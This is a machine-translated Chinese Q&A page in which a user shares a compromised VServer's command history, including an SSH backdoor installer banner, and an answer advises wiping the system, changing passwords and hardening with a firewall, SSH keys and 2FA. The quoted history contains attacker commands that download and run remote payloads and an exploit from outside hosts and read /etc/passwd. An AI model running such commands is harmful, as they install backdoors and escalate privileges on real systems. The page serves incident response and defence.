在VServer上找到SSH后门程序。该怎么办?

Modified on: Thu, 14 Jun 2018 04:32:23 +0800

昨天我查看了VServer上的命令历史记录。我发现了几条可疑线。

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

特别是sniffer.tgz震惊了我。我设置了一个虚拟机并下载了这个tgz档案。我开始设置它给了我这些线:

----------------------------------------------------------------------------------- #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1 PRIVATE VERSION ----------------------------------------------------------------------------------- CHECKING THIS SYSTEM # GCC: [ FOUND ] # G++: [ FOUND ] # MAKE: [ FOUND ] # OPENSSL DEVEL: [ NOT FOUND ] NOW TRYING TO INSTALL OPENSSL DEVEL

有谁知道如何删除它?

最佳答案

这是你应该对你已经拥有sniffer.tgz的所有系统所做的事情:从轨道直接 ,从干净的安装开始。 (也就是说,销毁系统,重新安装干净,从 clean 备份加载数据 - 假设您的备份是干净的,然后在将系统重新放回之前强化系统。因特网)。

每当恶意软件或黑客进入您的系统时,都需要重新分析您的系统配置方式,并确保重复与之相同的步骤。但是,因为这可能不是一个系统,你有能力抛开并进行法医分析,并且因为这可能是你唯一的服务器,所以是时候销毁虚拟系统,并从头开始(正如我上面所说)。

(这适用于你在系统上遇到恶意软件的任何情况。除非你有备用硬件来替换这样的东西,所以你可以隔离和法医检查破坏的系统,这通常是大多数用户没有的,你有别无选择,只能核对系统并重新开始。)

在没有分析你的服务器的情况下,我无法真正说出你做错了什么,但是这个后门程序可能比系统安装的简单“程序”更深入。并且,由于坏人已经在你的系统上安装了一个后门,你可以假设你的所有密码现在都被破坏了,不再安全(无论是SSH,还是MySQL root,还是任何其他类型的密码都有EVER已进入此计算机系统)。是时候改变所有你的密码了!


一旦你在干净的环境中恢复,这里有一些关于强化步骤的基本技巧。请注意,因为这些使得它更广泛的主题,我在这里无法深入细节,但是现在肯定是时候做一些强化步骤来保护你的系统:

  1. 打开防火墙仅允许访问需要打开的端口ufw存在很简单,所以让我们使用它。 sudo ufw enable。 (为您的环境正确配置ufw是一个不同的故事,这超出了这个问题的范围。)

  2. 限制对远程SSH的访问。这并不总是可行的,但理想情况下,您可以识别您拥有的IP地址,并在防火墙中将它们列入白名单。 (如果您使用的是动态住宅IP地址,请跳过此步骤。)

  3. 锁定对服务器的SSH访问仅要求使用SSH密钥进行身份验证。这样黑客就无法攻击您的服务器,只能猜测密码。猜测正确的私钥是非常困难的(因为你必须暴力破解所有私钥),这有助于防止暴力攻击。

  4. 如果您正在运营网站,请确保锁定权限,以便人们无法在闲暇时上传/执行内容。这样做会因站点而异,所以我不能在这里给你更多指导(这是不可能的)。

  5. 此外,如果您使用Joomla或Wordpress等运营网站,请确保您保持环境最新并修补软件提供商的安全漏洞

  6. 如果可能,设置,配置和使用双因素身份验证(2FA)方法,用于使用进行身份验证的内容。针对不同应用程序的第二因素身份验证有许多解决方案,并且以这种方式保护各种应用程序超出了本文的范围,因此在选择解决方案之前,您应该对此进行研究。

  7. 如果绝对必须在您的设置中使用密码,请使用合适的密码管理器(基于云的密码管理器不一定是不错的选择)并使用长篇(25+个字符),随机密码,对于通过密码保护的每个单独项目而言是不同的(因此建议使用密码管理器)。 (但是,您应该强烈考虑尽可能不使用密码(例如SSH身份验证),并尽可能使用2FA。)

  8. 醇>
作者:terdon,Thomas Ward

相关问答

添加新评论